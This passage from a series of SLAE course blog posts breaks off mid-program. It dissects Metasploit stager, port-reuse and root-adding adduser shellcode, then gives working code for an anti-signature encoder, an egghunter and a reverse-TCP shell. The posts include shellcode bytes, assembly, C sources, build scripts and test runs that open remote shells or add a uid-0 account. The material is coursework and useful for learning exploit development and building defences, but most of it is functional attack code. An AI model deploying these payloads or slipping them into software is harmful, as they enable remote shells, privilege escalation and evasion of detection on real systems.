             struct in_addr sin_addr = {
                 unsigned long s_addr = 1698212032 (host=192.168.56.101);
             };
             char sin_zero = "       ";
         };
     int addrlen = 102;
) =  0;

Here we see clearly the initial syscalls and their parameters. We can also view the same information graphically:

$ dot shellcode.dot -T png -o shellcode.png

Finally we'll manually analyse the shellcode to understand the complete functionality. To disassemble it:

$ echo -ne "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\xb0\x66\x89\xe1\xcd\x80\x97\x5b\x68\xc0\xa8\x38\x65\x68\x02\x00\x11\x5c\x89\xe1\x6a\x66\x58\x50\x51\x57\x89\xe1\x43\xcd\x80\xb2\x07\xb9\x00\x10\x00\x00\x89\xe3\xc1\xeb\x0c\xc1\xe3\x0c\xb0\x7d\xcd\x80\x5b\x89\xe1\x99\xb6\x0c\xb0\x03\xcd\x80\xff\xe1" | ndisasm -b 32 -

The first operation is, as we've seen previously, a socket call:

; man 2 socket
; int socket(int domain, int type, int protocol);
; Parameters can be viewed with strace commnad
; socket(PF_INET, SOCK_STREAM, IPPROTO_IP)
00000000  31DB              xor ebx,ebx         ; Zero out ebx
00000002  F7E3              mul ebx             ; Zero out eax
00000004  53                push ebx            ; Protocol - IPPROTO_IP (0) 
00000005  43                inc ebx             ; int call - SYS_SOCKET (1)
00000006  53                push ebx            ; Type - SOCK_STREAM (1)
00000007  6A02              push byte +0x2      ; Domain - AF_INET (2)
00000009  B066              mov al,0x66         ; sys_socketcall
0000000B  89E1              mov ecx,esp         ; Parameters
0000000D  CD80              int 0x80            ; Fire up the interrupt

Next is the connect call, which was also executed by the emulator:

; connect(3, {sa_family=AF_INET, sin_port=htons(4444), sin_addr=inet_addr("192.168.56.101")}, 102)
0000000F  97                xchg eax,edi        ; fd is returned, then stored into edi
00000010  5B                pop ebx             ; ebx is 2
00000011  68C0A83865        push dword 0x6538a8c0
00000016  680200115C        push dword 0x5c110002
0000001B  89E1              mov ecx,esp
0000001D  6A66              push byte +0x66     ; sys_socketcall
0000001F  58                pop eax
00000020  50                push eax
00000021  51                push ecx
00000022  57                push edi            ; push first param - the fd
00000023  89E1              mov ecx,esp
00000025  43                inc ebx             ; int call - SYS_CONNECT (3)
00000026  CD80              int 0x80

Next operations were not executed by the emulator. Following is an mprotect call, which sets protection on a region of memory. The function has the following syntax:

int mprotect(const void *addr, size_t len, int prot);

The parameters of the call can be easily viewed with the strace utility:

mprotect(0xbff7e000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC) = 0

The defines have the following values:
PROT_READ 0x1
PROT_WRITE 0x2
PROT_EXEC 0x4
And if we verify with the assembly code:

00000028  B207              mov dl,0x7          ; PROT_READ|PROT_WRITE|PROT_EXEC
0000002A  B900100000        mov ecx,0x1000      ; 4096
0000002F  89E3              mov ebx,esp
00000031  C1EB0C            shr ebx,0xc
00000034  C1E30C            shl ebx,0xc
00000037  B07D              mov al,0x7d         ; sys_mprotect
00000039  CD80              int 0x80

The final part of the shellcode is, as expected, the read call, which will get the 2nd stage payload from the server, and then execute it:

; man 2 read
; read - read from a file descriptor
; ssize_t read(int fd, void *buf, size_t count);
0000003B  5B                pop ebx             ; fd to read from; pushed at 'push edi' line
0000003C  89E1              mov ecx,esp         ; buffer
0000003E  99                cdq
0000003F  B60C              mov dh,0xc          ; count - a lot of data to be read...
00000041  B003              mov al,0x3          ; sys_read
00000043  CD80              int 0x80
00000045  FFE1              jmp ecx             ; the buffer thathas been read. execute it

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE- 449

Metasploit Linux shell_find_port shellcode

This post is part of the 5th assignment of the SLAE course and will analyse a Metasploit socket reuse shellcode: linux/x86/shell_find_port.
I've started by analysing this payload:

# msfpayload linux/x86/shell_find_port S

       Name: Linux Command Shell, Find Port Inline
     Module: payload/linux/x86/shell_find_port
    Version: 0
   Platform: Linux
       Arch: x86
Needs Admin: No
 Total size: 169
       Rank: Normal

Provided by:
  Ramon de C Valle <rcvalle metasploit.com>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
CPORT  60957            no        The local client port

Description:
  Spawn a shell on an established connection

So this is actually a port reuse shellcode: it will search for an already established connection (based on the local client port specified in CPORT variable) and spawn a shell over that connection. Nice! There is a great description of how this payload functions at BlachatLibrary.
Basically to test this payload we'll need:

A server that listens for connections and also executes payloads
A client that will establish a connection with the server from a fixed local port, then send our metasploit shellcode.

For this we'll use the socket-loader.c and socket-reuse-send.c from BlackhatLibrary.
We'll first compile and start the server:

$ gcc -Wall -o socket-loader socket-loader.c 
$ ./socket-loader 7001

Then generate the metasploit payload and integrate it into the socket-reuse-send source file:

# msfpayload linux/x86/shell_find_port CPORT=4444 C
/*
 * linux/x86/shell_find_port - 62 bytes
 * http://www.metasploit.com
 * VERBOSE=false, CPORT=4444, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false, InitialAutoRunScript=, AutoRunScript=
 */
unsigned char buf[] = 
"\x31\xdb\x53\x89\xe7\x6a\x10\x54\x57\x53\x89\xe1\xb3\x07\xff"
"\x01\x6a\x66\x58\xcd\x80\x66\x81\x7f\x02\x11\x5c\x75\xf1\x5b"
"\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73"
"\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b"
"\xcd\x80";

# gcc -Wall -o socket-reuse-send socket-reuse-send.c

The syntax for client is as follows:
./socket-reuse-send <server_ip> <server_port> <client_ip> <local_client_port>
So the next line will connect to the server listening on port 7001 and send the payload generated earlier from the local port 4444. The payload will then be executed by the server and we'll get a shell:

# ./socket-reuse-send 192.168.56.1 7001 192.168.56.101 4444
 [*] Connecting to 192.168.56.1
 [*] Sending payload
whoami
liv

So the payload is working as expected, now onto analysis. We'll first try to use the sctest binary from libemu:

# msfpayload linux/x86/shell_find_port CPORT=4444 R > shellcode.bin
$ cat shellcode.bin | /opt/libemu/bin/sctest -vvv -S -s 1000 -G shellcode.dot
$ dot shellcode.dot -T png -o shellcode.png

shell_find_port shellcode

This way we can get a feeling about how this shellcode is functioning. As we'll see later, there is a final piece missing from the picture, because the sctest emulator is not leaving the loop (marked with red arrows).
We'll use a disassembler to examine all the instructions:

$ echo -ne "\x31\xdb\x53\x89\xe7\x6a\x10\x54\x57\x53\x89\xe1\xb3\x07\xff\x01\x6a\x66\x58\xcd\x80\x66\x81\x7f\x02\x11\x5c\x75\xf1\x5b\x6a\x02\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" | ndisasm -b 32 -

First operation done by a server is, as seen in the picture, to execute getpeername in a loop. This will try to obtain information about a peer connected to a specific file descriptor.

int getpeername(int sockfd, struct sockaddr *addr, socklen_t *addrlen);

00000000  31DB              xor ebx,ebx
00000002  53                push ebx
00000003  89E7              mov edi,esp
00000005  6A10              push byte +0x10     ;  addrlen
00000007  54                push esp            ; *addrlen
00000008  57                push edi            ; *addr
00000009  53                push ebx            ; sockfd to search
0000000A  89E1              mov ecx,esp
0000000C  B307              mov bl,0x7          ; int call - SYS_GETPEERNAME (7)
getpeername_loop:
0000000E  FF01              inc dword [ecx]     ; increment fd to be checked
00000010  6A66              push byte +0x66     ; sys_socketcall
00000012  58                pop eax
00000013  CD80              int 0x80

The next part we'll check for a specific condition for any file descriptor found: it will verify the source port and if it's different than 4444 we'll increment the file descriptor and re-execute the loop:

; 115c(hex) = 4444 (dec)
; compare port
; struct sockaddr_in {
    short            sin_family;   // e.g. AF_INET, AF_INET6
    unsigned short   sin_port;     // e.g. htons(3490)
    struct in_addr   sin_addr;     // see struct in_addr, below
    char             sin_zero[8];  // zero this if you want to
};
00000015  66817F02115C      cmp word [edi+0x2],0x5c11
; if not, jump to getpeername_loop
0000001B  75F1              jnz 0xe

In case a connection was found with the source port equal to 4444, it will execute in a loop 3 dup2 calls, and duplicate stdin, stdout and stderr to the found file descriptor:

0000001D  5B                pop ebx         ; old fd parameter;  
0000001E  6A02              push byte +0x2  ; 
00000020  59                pop ecx         ; new fd
dup2_loop:
00000021  B03F              mov al,0x3f     ; sys_dup2 syscall
00000023  CD80              int 0x80
00000025  49                dec ecx
00000026  79F9              jns 0x21        ; if not -1, jump to dup2_loop label

The final piece of the shellcode executes /bin/sh:

00000028  50                push eax
00000029  682F2F7368        push dword 0x68732f2f   ; 'hs//'
0000002E  682F62696E        push dword 0x6e69622f   ; 'nib/'
00000033  89E3              mov ebx,esp     ; '/bin/sh\x00'
00000035  50                push eax
00000036  53                push ebx
00000037  89E1              mov ecx,esp     ; address of the parameters array
00000039  99                cdq
0000003A  B00B              mov al,0xb      ; sys_execve
0000003C  CD80              int 0x80

Metasploit Linux adduser shellcode analysis

This post is part of the 5th assignment of the SLAE course and will analyse the Metasploit linux/x86/adduser shellcode.
First let's generate the shellcode:

# msfpayload linux/x86/adduser USER=jsmith PASS=ok  C

This will generate a payload that will create a new root user, with uid and gid equal to 0.

/*
 * linux/x86/adduser - 93 bytes
 * http://www.metasploit.com
 * VERBOSE=false, PrependSetresuid=false, 
 * PrependSetreuid=false, PrependSetuid=false, 
 * PrependSetresgid=false, PrependSetregid=false, 
 * PrependSetgid=false, PrependChrootBreak=false, 
 * AppendExit=false, USER=jsmith, PASS=ok, SHELL=/bin/sh
 */
unsigned char buf[] = 
"\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51"
"\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63"
"\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x24\x00\x00\x00\x6a\x73"
"\x6d\x69\x74\x68\x3a\x41\x7a\x2e\x54\x4f\x53\x72\x67\x72\x4d"
"\x36\x72\x6f\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e"
"\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01"
"\x58\xcd\x80";

To test it, I've integrated the shellcode into a C skeleton file and run against a Linux box:

# cat /etc/passwd | grep jsmith
# ./shellcode
Shellcode Length:  40 bytes
# cat /etc/passwd | grep jsmith
jsmith:Az.TOSrgrM6ro:0:0::/:/bin/sh
# su jsmith
# id
uid=0(root) gid=0(root) groups=0(root)

As we can see, the new root user was successfully created. Next I continued to disassemble it:

$ echo -ne "\x31\xc9\x89\xcb\x6a\x46\x58\xcd\x80\x6a\x05\x58\x31\xc9\x51\x68\x73\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe3\x41\xb5\x04\xcd\x80\x93\xe8\x24\x00\x00\x00\x6a\x73\x6d\x69\x74\x68\x3a\x41\x7a\x2e\x54\x4f\x53\x72\x67\x72\x4d\x36\x72\x6f\x3a\x30\x3a\x30\x3a\x3a\x2f\x3a\x2f\x62\x69\x6e\x2f\x73\x68\x0a\x59\x8b\x51\xfc\x6a\x04\x58\xcd\x80\x6a\x01\x58\xcd\x80" |ndisasm -b 32 -

Firstly, the shellcode restores the privileges, in case the running process would have dropped them:

00000000  31C9              xor ecx,ecx             ; Effective user id - 0
00000002  89CB              mov ebx,ecx             ; Real user id - 0
00000004  6A46              push byte +0x46         ; sys_setreuid16 syscall number
00000006  58                pop eax                 ; Sets real and effective user id
00000007  CD80              int 0x80                ; Fire the interrupt

Next, it will open the /etc/passwd file. The flags for opening the file will be set to 0x00000401: O_WRONLY|O_APPEND. (Note1: the mode for opening the file, which should have been in EDX register, is not specified because it is ignored for O_CREAT flag not specified):

00000009  6A05              push byte +0x5
0000000B  58                pop eax                 ; Prepare eax for sys_open syscall
0000000C  31C9              xor ecx,ecx             ; Set ecx to 0 
0000000E  51                push ecx                ; Push 0 to act as a null terminator
0000000F  6873737764        push dword 0x64777373   ; 'dwss'
00000014  682F2F7061        push dword 0x61702f2f   ; 'ap//'
00000019  682F657463        push dword 0x6374652f   ; 'cte/'
0000001E  89E3              mov ebx,esp             ; Filename: '/etc//passwd'
00000020  41                inc ecx

Note2: the open syscall and the parameters can also be easily viewed using strace program:

# strace ./shellcode
. . . 
open("/etc//passwd", O_WRONLY|O_APPEND) = 3

The next part will write the "jsmith:Az.TOSrgrM6ro:0:0::/:/bin/sh\n" string to it (username and encrypted password):

00000025  93                xchg eax,ebx
00000026  E824000000        call dword 0x4f
; String starts  here -->
; jsmith:Az.TOSrgrM6ro:0:0::/:/bin/sh\n
0000002B  6A73              push byte +0x73
0000002D  6D                insd
0000002E  6974683A417A2E54  imul esi,[eax+ebp*2+0x3a],dword 0x542e7a41
00000036  4F                dec edi
00000037  53                push ebx
00000038  7267              jc 0xa1
0000003A  724D              jc 0x89
0000003C  36726F            ss jc 0xae
0000003F  3A30              cmp dh,[eax]
00000041  3A30              cmp dh,[eax]
00000043  3A3A              cmp bh,[edx]
00000045  2F                das
00000046  3A2F              cmp ch,[edi]
00000048  62696E            bound ebp,[ecx+0x6e]
0000004B  2F                das
0000004C  7368              jnc 0xb6
0000004E  0A. |--> String ends here

We then have to disassemble the instructions starting after the end of string (easily done in gdb):

00000051  51                push ecx
00000052  FC                cld
00000053  6A04              push byte +0x4
00000055  58                pop eax         ; sys_write syscall
00000056  CD80              int 0x80
; write(3, "jsmith:Az.TOSrgrM6ro:0:0::/:/bin"..., 36) = 36

Finally the shellcode calls the exit function to cleanly finish execution:

00000058  6A01              push byte +0x1
0000005A  58                pop eax         ; sys_exit syscall
0000005B  CD80              int 0x80

Custom encoding scheme

For the 4th assignment of SLAE, I've made a custom encoding scheme, with the same purpose as the insertion encoder: avoid signature detection by inserting garbage bytes into the shellcode.

The encoding scheme is as follows: we start from a working shellcode and insert garbage blocks, containing a random garbage byte and the offset to the next garbage block.
The distance between the garbage blocks is a random value between 2 modifiable limits. In this way we can control the final length of the shellcode and the amount of garbage inserted:

The encoded shellcode will look like this:
---------------------------------------------------------
| n0 | . . .| b1 | n1 | . . . . .| b2 | n2 | . . . |END |
---------------------------------------------------------

ni - next garbage byte position
bi - garbage byte
END - END of the shellcode marker

The encoding is done in a short python script:

#!/usr/bin/python
'''
    Python Insertion Encoder 
 
'''

import random

# Execve-stack shellcode - execve(/bin/sh,..)
shellcode = ("\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80")

encoded = ""

idx = 1

# Control  the frequency of garbage through a displacement
MIN_DEP = 3     # min number of shellcode bytes after which to inject garbage
MAX_DEP = 4     # max ...
dep = random.randint(MIN_DEP, MAX_DEP)
n = idx + dep
encoded += '\\x%02x' % n
END = "\\xf0\\x0d"

for x in bytearray(shellcode) :
    if idx == n: 
        # We have reached an insertion point
        dep = random.randint(MIN_DEP, MAX_DEP)
        n = idx + dep

        encoded += '\\x%02x' % random.randint(1,255)
        encoded += '\\x%02x' % n
        idx += 2
    
    # Add a shellcode byte
    encoded += '\\x%02x' % x
    idx += 1

encoded += END

print encoded
# Print in nasm friendly form
print encoded.replace("\\x", ",0x")[1:]

print 'Initial len: %d, encoded len: %d' % (len(shellcode), 
    len(encoded)/4)

The decoding is done in the assembly shellcode:

global _start   

section .text
_start:

 jmp short call_shellcode

decoder:
 pop esi                     ; beginning of the encoded shellcode
 lea edi, [esi]              ; shellcode decoded in place. Edi - dest pointer
 xor eax, eax            
 mov al, byte [esi]          ; position of next garbage byte
 xor ebx, ebx
    push 1                      ; index into the shellcode
    pop ecx

decode: 
    cmp ecx, eax
    jnz short shellcode_byte    ; shellcode byte found 
    add ecx, 2                  ; garbage byte found. Advance 2 bytes
    mov al, byte [esi + eax + 1]; position of next garbage byte    
shellcode_byte:                 ; byte part of real shellcode
 mov bl, byte [esi + ecx]
 mov byte [edi], bl
 inc edi                     ; advance destination
 inc ecx                     ; advance source
 cmp byte [esi + ecx], 0xf0  ; check for END marker
    jnz decode
    cmp byte [esi + ecx + 1], 0x0d
    jnz decode
    jmp esi                     ; shellcode decoded in-place. Jump to it



call_shellcode:

 call decoder
 EncodedShellcode: db 0x04,0x31,0xc0,0x50,0x06,0x08,0x68,0x2f,0x15,0x0b,0x2f,0x12,0x0e,0x73,0x85,0x11,0x68,0x4e,0x14,0x68,0x96,0x18,0x2f,0x62,0xd8,0x1c,0x69,0x6e,0xf9,0x20,0x89,0xe3,0xa9,0x23,0x50,0x6d,0x26,0x89,0x60,0x29,0xe2,0x0e,0x2d,0x53,0x89,0x3b,0x30,0xe1,0xaa,0x34,0xb0,0x0b,0x55,0x37,0xcd,0xe2,0x3b,0x80,0xf0,0x0d

And now to test this:
- encode the execve-stack shellcode using the python script
- disassemble and examine the encoded shellcode
- define the shellcode bytes at the end of the assembly decoder
- assemble
- test using a C program which executes the payload

$ ./custom-encoder.py 
\x05\x31\xc0\x50\x68\xb1\x08\x2f\x58\x0c\x2f\x73\x71\x10\x68\x68\x88\x14\x2f\x62\x42\x17\x69\x6a\x1a\x6e\xba\x1d\x89\xf5\x21\xe3\x50\xe0\x25\x89\xe2\xaf\x29\x53\x89\x83\x2d\xe1\xb0\x33\x30\x0b\x1a\x33\xcd\x66\x36\x80\xf0\x0d
0x05,0x31,0xc0,0x50,0x68,0xb1,0x08,0x2f,0x58,0x0c,0x2f,0x73,0x71,0x10,0x68,0x68,0x88,0x14,0x2f,0x62,0x42,0x17,0x69,0x6a,0x1a,0x6e,0xba,0x1d,0x89,0xf5,0x21,0xe3,0x50,0xe0,0x25,0x89,0xe2,0xaf,0x29,0x53,0x89,0x83,0x2d,0xe1,0xb0,0x33,0x30,0x0b,0x1a,0x33,0xcd,0x66,0x36,0x80,0xf0,0x0d
Initial len: 25, encoded len: 56
$ echo -ne "\x05\x31\xc0\x50\x68\xb1\x08\x2f\x58\x0c\x2f\x73\x71\x10\x68\x68\x88\x14\x2f\x62\x42\x17\x69\x6a\x1a\x6e\xba\x1d\x89\xf5\x21\xe3\x50\xe0\x25\x89\xe2\xaf\x29\x53\x89\x83\x2d\xe1\xb0\x33\x30\x0b\x1a\x33\xcd\x66\x36\x80\xf0\x0d" | ndisasm -b 32 -
00000000  0531C05068        add eax,0x6850c031
00000005  B108              mov cl,0x8
00000007  2F                das
00000008  58                pop eax
00000009  0C2F              or al,0x2f
0000000B  7371              jnc 0x7e
0000000D  106868            adc [eax+0x68],ch
00000010  88142F            mov [edi+ebp],dl
00000013  624217            bound eax,[edx+0x17]
00000016  696A1A6EBA1D89    imul ebp,[edx+0x1a],dword 0x891dba6e
0000001D  F5                cmc
0000001E  21E3              and ebx,esp
00000020  50                push eax
00000021  E025              loopne 0x48
00000023  89E2              mov edx,esp
00000025  AF                scasd
00000026  295389            sub [ebx-0x77],edx
00000029  832DE1B033300B    sub dword [dword 0x3033b0e1],byte +0xb
00000030  1A33              sbb dh,[ebx]
00000032  CD66              int 0x66
00000034  3680F00D          ss xor al,0xd
$ ./compile.sh 
  [+] Assembling egghunter
  [+] Linking egghunter
\xeb\x2d\x5e\x8d\x3e\x31\xc0\x8a\x06\x31\xdb\x6a\x01\x59\x39\xc1\x75\x07\x83\xc1\x02\x8a\x44\x06\x01\x8a\x1c\x0e\x88\x1f\x47\x41\x80\x3c\x0e\xf0\x75\xe8\x80\x7c\x0e\x01\x0d\x75\xe1\xff\xe6\xe8\xce\xff\xff\xff\x04\x31\xc0\x50\x06\x08\x68\x2f\x15\x0b\x2f\x12\x0e\x73\x85\x11\x68\x4e\x14\x68\x96\x18\x2f\x62\xd8\x1c\x69\x6e\xf9\x20\x89\xe3\xa9\x23\x50\x6d\x26\x89\x60\x29\xe2\x0e\x2d\x53\x89\x3b\x30\xe1\xaa\x34\xb0\x0b\x55\x37\xcd\xe2\x3b\x80\xf0\x0d
  [+] House cleaning
  [+] Done!
$ ./shellcode 
Shellcode Length:  112 bytes
$ whoami
liv
$

Creating Egghunter shellcodes

For the third assignment of SLAE course I've studied different egghunter payloads. The starting reference paper for this is skape's Safely Searching Process Virtual Address Space.

I've implemented the 3 methods described in the paper:

access() - Small and robust egghunter using access(0 system call to check validity of addresses. Cons: size is 39 bytes and the egg needs to be executable because after finding it, the execution jump before the egg and continues on.
access() revisited - smaller (35 bytes), minor speed improvements, egg does not need to be executable. Cons: sets DF flag in case of failure (in very rare cases this could impact the running of the host application)
sigaction() - even smaller (30 bytes), robust and very fast (validates 16 bytes at a time). Cons: some very rare odd failure situation described in detail in the paper.

For the purpose of this post, I'll detail a slightly modified version of the sigaction() egghunter:

sigaction() reloaded - the smallest version (only 28 bytes). I've replaced the double check for the egg with only one check. To avoid finding the egg in the comparison from the shellcode, I've applied a small transform before searching for it (inc eax in this case, but could be any other 1 bytecode operation also - e.g. shifting bytes).

global _start   

section .text
_start:
    or cx,0xfff             ; page allignment
next_addr:
    inc ecx                 ; Pointer to region to be validated
    push byte +0x43         ; sigaction() syscall number
    pop eax                 ; Syscall number in eax
    int 0x80                ; Execut ethe syscall
    cmp al,0xf2             ; Compare with EFAULT
    jz short _start         ; Go to next page
    mov eax, <EGG>          ; The egg
    inc eax                 ; Egg modification. Avoid first find from above!
    mov edi,ecx             ; Prepare for comparison
    scasd                   ; Compare
    jnz short next_addr     ; Jump to next address
    jmp edi                 ; Jump to shellcode

To test it I've used the following C program simulating a real payload:
[ filler ] [ egghunter ] [ garbage ] [ shellcode ]

#include <stdio.h>
#include <string.h>

#define     EGG     "<EGG>"

unsigned char sled[] = "Some misc bytes here";
unsigned char egghunter[] = 
        "<EGGHUNTER>";
unsigned char garbage[] = "Garbage, mangled bytes, whatever";
// execve(/bin/sh,..) shellcode here 
unsigned char shellcode[] = EGG
        "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"
                "\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

// Function pointer
typedef int (*func_ptr)();

void main() {
    printf("Egghunter length: %d bytes\n", strlen(egghunter));
    printf("Shellcode Length:  %d bytes\n", strlen(shellcode));

    ((func_ptr) egghunter)();
}

The egg is configurable, and the compilation takes place from a wrapper script:

$ ./compile.sh 
Usage: compile.sh {4 chars EGG mark}
 E.g.: compile.sh W00T
$ ./compile.sh BUBU
  [*] Using egg  BUBU
  [*] (Modified) Egg hex:, 0x55425542
  [+] Replace egg with, BUBU
  [+] Assembling egghunter
  [+] Linking egghunter
  [*] Egghunter:
\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80\x3c\xf2\x74\xf1\xb8\x42\x55\x42\x55\x40\x89\xcf\xaf\x75\xeb\xff\xe7
  [+] Compile shellcode tester
  [+] House cleaning
  [+] Done! run ./shellcode
$ ./shellcode 
Egghunter length: 28 bytes
Shellcode Length:  29 bytes
$ whoami
liv
$

The complete source files and scripts mentioned can be found in the Git repository:
SLAE

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE- 449

Reverse TCP Shellcode

This is the second assignment of the SLAE exam: building a reverse TCP shellcode. As for the previous bind tcp one, I've started with a C program that creates a reverse TCP connection:

#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>

int main() {
    int sockfd = 0;
    int ret = 0;

    struct sockaddr_in dest;

    // Create an un-named socket. returns socket descriptor
    sockfd = socket(AF_INET, SOCK_STREAM, 0);

    memset(&dest, '0', sizeof(struct sockaddr));
    dest.sin_family = AF_INET;
    dest.sin_addr.s_addr = inet_addr("127.0.0.1"); 
    dest.sin_port = htons(8888);

    connect(sockfd, (struct sockaddr *)&dest, sizeof(struct sockaddr));

    // Duplicate stdin, stdout, stderr
    ret = dup2(sockfd, 0);
    if (-1 == ret) {
        printf("STDIN duplication failed: %s\n", strerror(errno));
        return 1;
    }

    ret = dup2(sockfd, 1);
    if (-1 == ret) {
        printf("STDOUT duplication failed: %s\n", strerror(errno));
        return 1;
    }

    ret = dup2(sockfd, 2);
    if (-1 == ret) {
        printf("STDERR duplication failed: %s\n", strerror(errno));
        return 1;
    }

    // Replace process image
    char *args[2];
    args[0] = "/bin/sh";
    args[1] = NULL;      // Needs to ne a NULL terminated list of args

    ret = execve(args[0], args, NULL);
    if (-1 == ret) {
        printf("Execve failed: %s\n", strerror(errno));
        return 1;
    }

    return 0;
}

I've then compiled the reverse shell:

$ gcc -Wall shell_reverse_tcp.c -o shell_reverse_tcp

Started the listener:

$ nc -lvvp 8888
Listening on [0.0.0.0] (family 0, port 8888)

And in another terminal executed the reverse shellcode:

$ ./shell_reverse_tcp

Listening on [0.0.0.0] (family 0, port 8888)
Connection from [127.0.0.1] port 8888 [tcp/*] accepted (family 2, sport 60226)
whoami
liv

To see the system calls necessary to implement this in assembly, I've used strace:

$ strace ./shell_reverse_tcp 
...
socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = 3
connect(3, {sa_family=AF_INET, sin_port=htons(8888), sin_addr=inet_addr("127.0.0.1")}, 16) = 0
dup2(3, 0)                              = 0
dup2(3, 1)                              = 1
dup2(3, 2)                              = 2
execve("/bin/sh", ["/bin/sh"], [/* 0 vars */]) = 0

Next is the commented assembly source implementing the system calls from above:

global _start   

section .text
_start:

    ; Linux Syscall Reference
    ; http://syscalls.kernelgrok.com/


    ; 1. socket(PF_INET, SOCK_STREAM, IPPROTO_IP) = sockfd
    xor eax, eax
    xor ebx, ebx
    xor ecx, ecx
    push ecx        ; NULL terminate args list
    mov cl, 6       ; IPPROTO_TCP (6)
    push ecx
    xor ecx, ecx
    mov cl, 1       ; SOCK_STREAM (1) - in socket.h
    push ecx
    xor ecx, ecx
    mov cl, 2       ; PF_INET (2) - IP PROTO FAMILY
    push ecx
    mov ecx, esp    ; socketcall arguments
    xor ebx, ebx
    mov bl, 1       ; socketcall type of call: SYS_SOCKET (1) 
    push 102
    pop eax         ; socketcall syscall
    int 0x80
    mov edx, eax    ; sockfd is returned in eax. Save into edx    

    ; 2. connect(3, {sa_family=AF_INET, sin_port=htons(8888), sin_addr=inet_addr("127.0.0.1")}, 16)
    ;struct sockaddr_in {
    ;    short            sin_family;   // e.g. AF_INET, AF_INET6
    ;    unsigned short   sin_port;     // e.g. htons(3490)
    ;    struct in_addr   sin_addr;     // see struct in_addr, below
    ;    char             sin_zero[8];  // zero this if you want to
    ;};
    ;struct in_addr {
    ;    unsigned long s_addr;          // load with inet_pton()
    ;};
    push <IP>       ; IP address
    push word <PORT>; 16 bits - port number
    push word 2     ; family - AF_INET (2)
    mov ecx, esp    ; pointer to args

    push byte 0x10  ; Address length - 16 bytes
    push ecx        ; Pointer to sockaddr_in structure
    push edx        ; sockfd from socket call

    mov ecx, esp    ; socketcall arguments
    xor ebx, ebx
    mov bl, 3       ; socketcall type of call: SYS_CONNECT (3)
    xor eax, eax
    mov al, 102     ; socketcall syscall
    int 0x80

    ; 3. dup2(connfd, 2), dup2(connfd, 1), dup2(connfd, 0)
    push 2
    pop ecx         ; ecx - newfd
    mov ebx, edx    ; edx - connfd, ebx - oldfd
    dup_loop:
    mov al, 63      ; dup2 syscall
    int 0x80
    dec ecx
    jns dup_loop    ; exit when signed (-1)
      
    ; 4. execve("/bin/sh", ["/bin/sh"], [/* 0 vars */])
 ; PUSH the first null dword 
 xor eax, eax
 push eax

    ; PUSH //bin/sh (8 bytes) 
 push 0x68732f2f ; 'hs//'
 push 0x6e69622f ; 'nib/
 mov ebx, esp    ; EBX - 1st param - NULL terminated filename

 push eax        ; EDX - 3rd param - NULL terminated list of env variables
 mov edx, esp    ; NULL terminator must be set before setting the 2nd param!

 push ebx        ; ECX - 2nd param - array of argument strings
 mov ecx, esp

 mov al, 11      ; execve syscall
 int 0x80

The IP and port are replaced by a bash script, which does compilation and linking:

$ ./compile.sh 
Usage: compile.sh {ip} {port}
$ ./compile.sh 127.0.0.2 8899
[+] Replacing IP with 0x0200007f
[+] Replacing port number with 0xc322
[+] Assembling with Nasm ... 
[+] Linking ...
[+] Cleaning ...
[+] Done!
$ nc -lvvp 8899 
Listening on [0.0.0.0] (family 0, port 8899)
$ ./shell_reverse_tcp
Connection from [127.0.0.1] port 8899 [tcp/*] accepted (family 2, sport 41801)
whoami
liv

The complete source files, wrapper bash script and test shellcode can be found in a git repository at:
SLAE

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification:
www.securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE- 449

Bind TCP shellcode

To create a bind TCP shellcode, I've first started with a small C program to do this and analysed the system calls. The following program listens for incoming connections and spawns a new shell:

#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <sys/types.h>

int main() {
    int listenfd = 0, connfd = 0;    
    int ret = 0;

    struct sockaddr_in serv_addr;

    // Create an un-named socket. returns socket descriptor
    listenfd = socket(AF_INET, SOCK_STREAM, 0);

    memset(&serv_addr, '0', sizeof(serv_addr));
    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = htonl(INADDR_ANY);
    serv_addr.sin_port = htons(4444);

    bind(listenfd, (struct sockaddr*) &serv_addr, sizeof(serv_addr));

    // Listen on the created socket for maximum 1 client connection
    listen(listenfd, 1);

    // Sleep waiting for client requests
